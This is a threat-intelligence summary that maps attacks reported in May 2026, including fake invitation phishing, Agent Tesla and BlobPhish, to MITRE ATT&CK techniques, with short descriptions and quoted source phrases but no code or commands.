Major Cyber Attacks in May 2026: Fake Invitations, Agent Tesla, BlobPhish, and More

MITRE Techniques

• [T1566.002] Phishing: Spearphishing Link – Used fake invitation flows, banking portals, and document lures to send victims to credential-harvesting pages [‘users followed an invitation that felt familiar’; ‘redirected users to a fake Word Online / OneDrive-style page’]
• [T1056.003] Input Capture: Web Portal Capture – Collected usernames, passwords, OTP codes, and verification data through phishing pages [‘collect usernames, passwords, OTP codes, and email verification data’]
• [T1556.004] Modify Authentication Process: Multi-Factor Authentication Interception – Intercepted OTPs in real time to bypass MFA protection [‘credential theft, OTP interception’]
• [T1105] Ingress Tool Transfer – Delivered remote access tools and installers during phishing chains [‘possible remote access tool delivery’; ‘moved through software installation stages’]
• [T1059.001] Command and Scripting Interpreter: PowerShell – Used PowerShell execution as part of fileless delivery from compromised websites [‘move users toward PowerShell execution’]
• [T1204.002] User Execution: Malicious File – Relied on users opening business-themed files such as invoices, purchase orders, and payroll documents [‘purchase orders, invoices, payroll files, and procurement requests’]
• [T1218] System Binary Proxy Execution – Used legitimate-looking tools and workflows to run attacker activity while blending in with normal administration or support behavior [‘remote access through tools that may look similar to normal IT or support activity’]
• [T1219] Remote Access Software – Deployed ScreenConnect and RMM-style access for hands-on control of victim systems [‘led to remote access through ScreenConnect’; ‘RMM deployment’]
• [T1027] Obfuscated Files or Information – Hid malicious activity with blob-generated pages, in-memory payloads, and concealment activity [‘generated the page directly inside the browser using blob objects’; ‘kept the malicious content in memory’]
• [T1055] Process Injection – Mentioned as part of fileless activity where malicious code may run in memory with fewer visible artifacts [‘process injection’]
• [T1102.001] Web Service: Dead Drop Resolver – Used legitimate or compromised web infrastructure to stage malicious content and redirect victims [‘compromised websites and injected scripts’]
• [T1071.001] Application Layer Protocol: Web Protocols – Enabled outbound command-and-control communication over web traffic [‘outbound C2 communication’]
• [T1078] Valid Accounts – Stolen email, browser, banking, and session data could be reused for unauthorized access [‘stolen email, browser, banking, and session data can open the door to BEC, fraud, SaaS compromise’]